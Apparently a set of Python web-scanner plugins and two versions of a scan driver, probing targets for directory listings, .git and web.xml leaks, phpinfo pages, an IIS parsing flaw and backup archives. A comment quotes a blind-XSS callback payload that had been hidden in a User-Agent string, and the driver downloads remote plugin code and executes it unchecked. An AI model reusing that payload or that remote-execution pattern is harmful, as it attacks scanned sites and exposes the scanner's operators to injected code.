def poc(arg):
    """Flag the target as a likely login platform when its cached body mentions 'password'."""
    body = collector.get_domain_info(arg, "body")
    if not body:
        return
    # Case-insensitive search across the whole cached response body.
    if re.search('password', body, re.I | re.M | re.S):
        collector.add_domain_bug(arg, {"登录平台发现": arg})
def poc(arg, **kwargs):
    """Probe common static directories for enabled directory listings.

    arg: base URL of the target. Records an "info_leak" bug through the
    module-level collector for every listing page found. Always returns
    False (plugin convention: findings go through the collector).
    """
    URL = arg
    netloc = urlparse(arg).netloc
    # Signatures that identify an auto-generated directory index page.
    flag_list = ["index of", "directory listing for", "{} - /".format(netloc)]
    hack = HackRequests.hackRequests()
    url_list = [
        URL + "/css/",
        URL + "/js/",
        URL + "/img/",
        URL + "/images/",
        URL + "/upload/",
        URL + "/inc/",
    ]
    for u in url_list:
        try:
            hh = hack.http(u)
        except Exception:  # FIX: was a bare except; narrow to Exception
            continue
        if hh.status_code == 404:
            continue
        # FIX: fetch/decode the body once per URL instead of once per
        # signature (it was re-read inside the flag loop).
        try:
            html = hh.text()
        except Exception:  # FIX: was a bare except
            html = ""
        lowered = html.lower()
        for flag in flag_list:
            if flag in lowered:
                result = {
                    "name": "web目录浏览",  # plugin name
                    "content": "通过此功能可获取web目录程序结构",  # impact: exposes web app layout
                    "url": u,  # URL where the listing was found
                    "log": hh.log,
                    "tag": "info_leak"  # bug tag
                }
                collector.add_domain_bug(arg, {"directory_browse": repr(result)})
    return False
def poc(arg):
    """Detect an exposed .git/config file (Git repository source leak).

    Returns False when nothing is found or the request fails; reports the
    finding through the collector otherwise.
    """
    target = arg + "/.git/config"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    }
    try:
        resp = requests.get(target, headers=headers, timeout=5)
        # A real git config contains this key in its [core] section.
        if "repositoryformatversion" not in resp.text:
            return False
        collector.add_domain_bug(arg, {"Git Leak": target})
    except Exception:
        return False
def poc(arg):
    """Check whether /WEB-INF/web.xml is directly downloadable (Tomcat/servlet
    container configuration leak).

    Returns a '[Tomcat xmlLeak]<url>' marker string on success, False otherwise.
    """
    url = arg + "/WEB-INF/web.xml"
    try:
        header = dict()
        # FIX: the original User-Agent had "<sCRiPt/SrC=//60.wf/4PrhD>" (a
        # blind-XSS callback payload) appended — inconsistent with the clean
        # UA every sibling plugin sends, and almost certainly unintended.
        header[
            "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        r = requests.get(url, headers=header, timeout=5)
        # Any servlet deployment descriptor starts with a <web-app ...> root.
        if "<web-app" in r.text:
            collector.add_domain_bug(arg, {"Tomcat xmlLeak": url})
            return '[Tomcat xmlLeak]' + url
        else:
            return False
    except Exception:
        return False
def poc(arg):
    """Probe for the IIS path-parsing flaw by requesting /robots.txt/.php.

    If the server answers 200 with an HTML content type, the .php suffix was
    parsed, which indicates the vulnerability. Returns False otherwise.
    """
    probe = arg + "/robots.txt/.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    }
    try:
        resp = requests.get(probe, headers=headers, timeout=5)
        content_type = resp.headers.get("Content-Type", "")
        if resp.status_code == 200 and "text/html" in content_type:
            collector.add_domain_bug(arg, {"iis parse": probe})
        else:
            return False
    except Exception:
        return False
def poc(arg):
    """Look for commonly named phpinfo() pages under the target.

    A cheap HEAD filters out non-200 paths before the full GET; a page is a
    hit when it returns 200 and contains the phpinfo marker 'allow_url_fopen'.
    Returns the list of hit URLs, or False when none were found.
    """
    candidates = (
        "phpinfo.php", "PhpInfo.php", "PHPinfo.php", "PHPINFO.php",
        "phpInfo.php", "info.php", "Info.php", "INFO.php",
        "phpversion.php", "phpVersion.php", "test1.php", "test.php",
        "test2.php", "phpinfo1.php", "phpInfo1.php", "info1.php",
        "PHPversion.php", "x.php", "xx.php", "xxx.php",
    )
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    }
    hits = []
    for name in candidates:
        url = arg + "/" + name
        try:
            probe = requests.head(url, headers=headers, timeout=5)
            if probe.status_code != 200:
                continue
            resp = requests.get(url, headers=headers, timeout=5)
            if "allow_url_fopen" in resp.text and resp.status_code == 200:
                hits.append(url)
        except Exception:
            pass
    if not hits:
        return False
    collector.add_domain_bug(arg, {"phpinfo": hits})
    return hits
def hand_domain(self, serviceType):
    """Scan one web target end-to-end.

    Fetches the target once, runs the local plugin chain against it, then —
    when a CMS fingerprint was recorded — downloads and concurrently executes
    matching remote POC plugins. All findings flow through the module-level
    ``collector``.

    serviceType: dict describing the job; only the "target" URL is read here
    (assumed schema — confirm against the caller).
    """
    target = serviceType["target"]
    logger.info(target)
    # Register this target record
    collector.add_domain(target)
    # Issue the initial request; its headers/body/status feed the plugins below.
    try:
        r = requests.get(target,
                         timeout=30,
                         verify=False,
                         allow_redirects=False)
        collector.add_domain_info(target, {
            "headers": r.headers,
            "body": r.text,
            "status_code": r.status_code
        })
    except Exception as e:
        # Unreachable target: drop the record and stop scanning it.
        logger.error("request url error:" + str(e))
        collector.del_domain(target)
        return
    logger.debug("target:{} over,start to scan".format(target))
    # Get hostname (strip any :port suffix) and resolve it to an IP.
    hostname = urlparse(target).netloc.split(":")[0]
    if not is_ip_address_format(hostname):
        try:
            _ip = socket.gethostbyname(hostname)
            collector.add_domain_info(target, {"ip": _ip})
        except:
            pass
    else:
        collector.add_domain_info(target, {"ip": hostname})
    # Local plugins that gather target information.
    work_list = [
        webeye.poc, webtitle.poc, wappalyzer.poc, password_found.poc
    ]
    if IS_START_PLUGINS:
        work_list.append(crossdomain.poc)
        work_list.append(directory_browse.poc)
        work_list.append(gitleak.poc)
        work_list.append(iis_parse.poc)
        work_list.append(phpinfo.poc)
        work_list.append(svnleak.poc)
        work_list.append(tomcat_leak.poc)
        work_list.append(whatcms.poc)
        # WorkList.append(bakfile.poc)  # backup-file scan removed: too slow
    # th = []
    # try:
    #     for func in work_list:
    #         i = threading.Thread(target=func, args=(target,))
    #         i.start()
    #         th.append(i)
    #     for thi in th:
    #         thi.join()
    # except Exception as e:
    #     logger.error("domain plugin threading error {}:{}".format(repr(Exception), str(e)))
    # Plugins are run sequentially; each stores its findings via the collector.
    for func in work_list:
        try:
            func(target)
        except Exception as e:
            logger.error("domain plugin threading error {}:{}".format(
                repr(Exception), str(e)))
    logger.debug("target:{} End of scan".format(target))
    infos = collector.get_domain(target)
    _pocs = []
    temp = {}
    if IS_START_PLUGINS and "CMS" in infos:
        # Promote the CMS fingerprint into the "app" list used for poc matching.
        if infos.get("app"):
            temp["app"] = []
            temp["app"].append(infos["CMS"])
        else:
            temp["app"] = [infos["CMS"]]
        # update domain app
        collector.add_domain_info(target, temp)
    if temp.get("app"):
        keywords = temp["app"]
        # Load the remote plugin index.
        pocs = load_remote_poc()
        for poc in pocs:
            for keyword in keywords:
                if poc["name"] == keyword:
                    webfile = poc["webfile"]
                    logger.debug("load {0} poc:{1} poc_time:{2}".format(
                        poc["type"], webfile, poc["time"]))
                    # Load the plugin: fetch its source and build a module object.
                    code = requests.get(webfile).text
                    obj = load_string_to_module(code, webfile)
                    _pocs.append(obj)
    # Run the loaded remote plugins concurrently.
    if _pocs:
        executor = futures.ThreadPoolExecutor(len(_pocs))
        fs = []
        for f in _pocs:
            taks = executor.submit(f.poc, target)
            fs.append(taks)
        for f in futures.as_completed(fs):
            try:
                res = f.result()
            except Exception as e:
                res = None
                logger.error("load poc error:{} error:{}".format(
                    target, str(e)))
            if res:
                # Fall back to a timestamped name when the poc result has none.
                name = res.get("name") or "scan_" + str(time.time())
                collector.add_domain_bug(target, {name: res})
    collector.send_ok(target)
def audit(arg):
    """Probe the target for commonly named backup archives.

    Candidates are a fixed list (wwwroot.zip, web.rar, ...) plus archives
    derived from the hostname parts (e.g. www.rar, example.zip, host.tar.gz).
    A hit is a 200 response with an "application" content type. More than six
    hits is treated as a server that answers 200 to everything (false
    positive) and returns False; otherwise findings are reported through the
    collector.

    arg: base URL of the target.
    """
    url = arg
    netloc = urlparse(url).netloc
    # FIX: original listed "web.tar" twice; the second was clearly meant to
    # be "web.tar.gz" (every other base name has all four extensions).
    dirs = '''wwwroot.rar
wwwroot.zip
wwwroot.tar
wwwroot.tar.gz
web.rar
web.zip
web.tar
web.tar.gz
ftp.rar
ftp.zip
ftp.tar
ftp.tar.gz
admin.rar
admin.zip
admin.tar
admin.tar.gz
www.rar
www.zip
www.tar
www.tar.gz
'''
    listFile = [line.strip() for line in dirs.strip().splitlines()]
    # FIX: original filtered with `key is ''` (identity check on a literal —
    # unreliable) and removed/appended while iterating the same list, which
    # skips elements. Build the key list functionally instead.
    host_keys = [key for key in netloc.split(".") if key != '']
    # Parity with the original: keys containing dots also get an
    # underscore-joined variant (split(".") parts normally contain none).
    host_keys += [key.replace('.', "_") for key in host_keys if '.' in key]
    host_keys.append(netloc)
    for key in host_keys:
        for ext in (".rar", ".zip", ".tar.gz", ".tar"):
            listFile.append(key + ext)
    warning_list = []
    header = dict()
    header[
        "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    for payload in listFile:
        loads = url + "/" + payload
        try:
            r = requests.head(loads, headers=header, timeout=7)
            if r.status_code != 200:
                continue
            # FIX: was `header=header` — an invalid kwarg that made every GET
            # raise TypeError, silently swallowed below, so this plugin could
            # never report anything.
            r = requests.get(loads, headers=header, timeout=7)
            if r.status_code == 200 and "application" in r.headers.get(
                    "Content-Type", ""):
                warning_list.append("[BAKFILE] " + loads)
        except Exception:
            pass
    # In order to solve the misreport: too many hits means a wildcard 200.
    if len(warning_list) > 6:
        return False
    elif warning_list:
        collector.add_domain_bug(url, {"bakfile": repr(warning_list)})
def hand_domain(self, serviceType):
    """Scan one web target: fetch it, run the enabled local plugins, then load
    and concurrently execute remote CMS-matched POC plugins.

    serviceType: dict describing the job; only the "target" URL is read here
    (assumed schema — confirm against the caller). Findings are persisted
    through the module-level ``collector``.
    """
    target = serviceType["target"]
    logger.info(target)
    # Register this target record
    collector.add_domain(target)
    # Issue the initial request; headers/body/status feed the plugins below.
    try:
        r = requests.get(target,
                         timeout=30,
                         verify=False,
                         allow_redirects=False)
        collector.add_domain_info(target, {
            "headers": r.headers,
            "body": r.text,
            "status_code": r.status_code
        })
    except Exception as e:
        # Unreachable target: drop the record and stop scanning it.
        logger.error("request url error:" + str(e))
        collector.del_domain(target)
        return
    logger.debug("target:{} over,start to scan".format(target))
    # Get hostname (strip any :port suffix) and resolve it to an IP.
    hostname = urlparse(target).netloc.split(":")[0]
    if not is_ip_address_format(hostname):
        try:
            # return the host from socket
            _ip = socket.gethostbyname(hostname)
            collector.add_domain_info(target, {"ip": _ip})
        except:
            pass
    else:
        collector.add_domain_info(target, {"ip": hostname})
    # Which POCs to run for target information gathering.
    work_list = [webeye.poc, webtitle.poc, wappalyzer.poc]
    # password_found.poc
    if IS_START_PLUGINS:
        pass
        work_list.append(crossdomain.poc)
        # work_list.append(directory_browse.poc)
        work_list.append(gitleak.poc)
        work_list.append(iis_parse.poc)
        work_list.append(phpinfo.poc)
        work_list.append(svnleak.poc)
        work_list.append(tomcat_leak.poc)
        # work_list.append(whatcms.poc)
    # Plugins store their findings directly via the collector.
    for func in work_list:
        try:
            func(target)
        except Exception as e:
            logger.error("domain plugin threading error {}:{}".format(
                repr(Exception), str(e)))
            pass
    logger.debug("target:{} End of scan".format(target))
    collector.print_domains()
    infos = collector.get_domain(target)
    _pocs = []
    temp = {}
    if IS_START_PLUGINS and "CMS" in infos:
        # Promote the CMS fingerprint into the "app" list used for poc matching.
        if infos.get("app"):
            temp["app"] = []
            temp["app"].append(infos["CMS"])
        else:
            temp["app"] = [infos["CMS"]]
        # update domain app
        collector.add_domain_info(target, temp)
    if temp.get("app"):
        keywords = temp["app"]
        # Load the remote plugin index.
        pocs = load_remote_poc()
        for poc in pocs:
            for keyword in keywords:
                # NOTE(review): unlike the sibling hand_domain, there is no
                # `poc["name"] == keyword` filter here, so every remote poc is
                # fetched once per keyword regardless of match — confirm this
                # is intentional. Also note the spelling
                # `load_string_to_moudle` vs `load_string_to_module` elsewhere.
                webfile = poc["webfile"]
                logger.debug("load {0} poc:{1} poc_time:{2}".format(
                    poc["type"], webfile, poc["time"]))
                # Load the plugin: fetch the remote source and turn it into a
                # module object.
                code = requests.get(webfile).text
                obj = load_string_to_moudle(code, webfile)
                # Append the remote module to the module-object list.
                _pocs.append(obj)
    # Run the loaded remote plugins concurrently.
    if _pocs:
        executor = futures.ThreadPoolExecutor(len(_pocs))
        fs = []
        for f in _pocs:
            # submit() returns a Future that controls the task.
            taks = executor.submit(f.poc, target)
            fs.append(taks)
        for f in futures.as_completed(fs):
            try:
                res = f.result()
            except Exception as e:
                res = None
                logger.error("load poc error:{} error:{}".format(
                    target, str(e)))
            if res:
                # Fall back to a timestamped name when the poc result has none.
                name = res.get("name") or "scan_" + str(time.time())
                collector.add_domain_bug(target, {name: res})
    # Async plugin results were pushed through the collector; signal completion.
    collector.send_ok(target)
    print("print collector")
    print(collector.collect_domains)